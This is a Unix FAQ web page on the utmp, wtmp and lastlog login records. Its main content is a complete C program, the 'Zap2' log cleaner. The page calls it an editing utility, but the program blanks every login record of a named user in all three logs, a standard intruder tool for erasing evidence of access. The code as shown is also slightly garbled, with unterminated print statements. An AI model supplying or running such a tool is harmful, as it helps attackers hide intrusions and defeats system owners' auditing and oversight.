• FAQs
• Articles
• Tutorials
• Web Tools
• Reference
• Blog
• Proxy
• Software
• Cell Phones

• Unix FAQs
• How do I find a Unix command?
• What is the history of Unix?
• What are basic Unix commands?
• What is a Unix shell?
• What is a Unix script?
• How do Unix file permissions work?
• Where can I find a Unix tutorial?
• Where can I download Unix?
• Where can I get a Unix emulator?
• What is sudo?
• How do I audit Unix passwords?
• What is password shadowing?
• What is password aging?
• What is NIS (yp)?
• What is a restricted shell?
• What security problems exist with SUID script and programs?
• How do Unix system log files work?
• What is a rootkit?
• How do Unix timestamps work?
• What is Linux?
• What are bootable Linux distributions?
• How do I setup a Linux file server?
• How do I change to directories with strange characters in them?
• What is a daemon?
• How can I change my Unix password?
• How do I change my shell?
• What is .profile?
• What is .login?
• What is a run level?
• How do I set an environment variable?
• What is UMASK?
• What are Unix signals?
• How do I change a hostname on Solaris?
• How do I change an IP address on Solaris?
• What are Pluggable Authentication Modules?
• How do I capture a Unix terminal session?
• How do I list Unix users?
• How do I backup Unix?
• How do I create a cron job?
• How do I use the Unix find command?
• How do I use the Unix sort command?
• How do I use the Unix grep command?
• How do I use the Unix top command?
• How do I install Linux on my Xbox?
• How do I copy Unix files to Windows?
• How Do I Tell What Shell I am Using?
• How Do I Find Out CPU Utilization in UNIX?
• How Do I Copy a Directory from DOS to UNIX?
• Main Menu
• » Networking
• » Physical Layer
• » Data Link Layer
• » Network Layer
• » Network Security
• » Wireless Networks
• » VoIP
• » Telephony
• » Mobile Telephony
• » Electronics
• » Radio
• » Television
• » Cryptology
• » Passwords
• » Smart Cards
• » Privacy
• » Malware
• » Vulnerabilities
• » Unix
• » Macintosh
• » Microsoft Windows
• » The Web
• » Web Publishing
• » E-mail
• » Instant Messaging
• » Databases
• » Computer Hardware
• » CPU's
• » Memory
• » Storage
• » Video
• » Audio
• » Multimedia
• » Satellite
• » Java
• » IT Management
• » Science
• » Miscellaneous

How do Unix System Logs Files work?

Unix system log files include:

• utmp
• wtmp
• lastlog

Unix records information about current users in the file utmp, logins and logouts in the file wtmp, and last logins in the file lastlog. The time stamps of date changes, shutdowns and reboots are also logged in the wtmp file.

The usual locations of these files are:

Log file	Usual location
utmp	/etc/utmp
wtmp	/usr/adm/wtmp
lastlog	/usr/adm/lastlog

Editing Unix System Log Files

These are not text files that can be edited by hand with vi; these are binary files which should be edited with programs specifically written for this purpose.

Here is one such program:

#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
 
int f;
 
void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;
 
  if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
  }
}
 
void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;
 
    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))>=0) {
 
     while(pos != -1L) {
        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
        if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
          pos = -1L;
        } else {
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
               bzero((char *)&utmp_ent,sizeof(struct utmp ));
               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
               write (f, &utmp_ent, sizeof (utmp_ent));
               pos = -1L;
          } else pos += 1L;
        }
     }
     close(f);
  }
}
 
void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;
 
     if ((pwd=getpwnam(who))!=NULL) {
 
        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }
 
    } else printf("%s: ?\n",who);
}
 
main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n
    } else
    printf("Error.\n
}

Purchase these excellent books on Unix security and administration at Amazon.com

Bookmark How do Unix System Logs Files work?

Latest Blog Posts

• Acai Berry Spam via MSN

• Obama Seeks Power to Shut Down the Internet

• Help Beta Test Tech-FAQ 2.0!

• Windows 7 Forum

• Boston College: Ability to Use a Command Line is a Sign of Criminal Activity

• Google Hacked?

• Recycle your old phone – Make some money, and save the environment too!

• SourceForge vs. Freshmeat

• Fastest Web Browser: Google Chrome

• New Webmaster Forum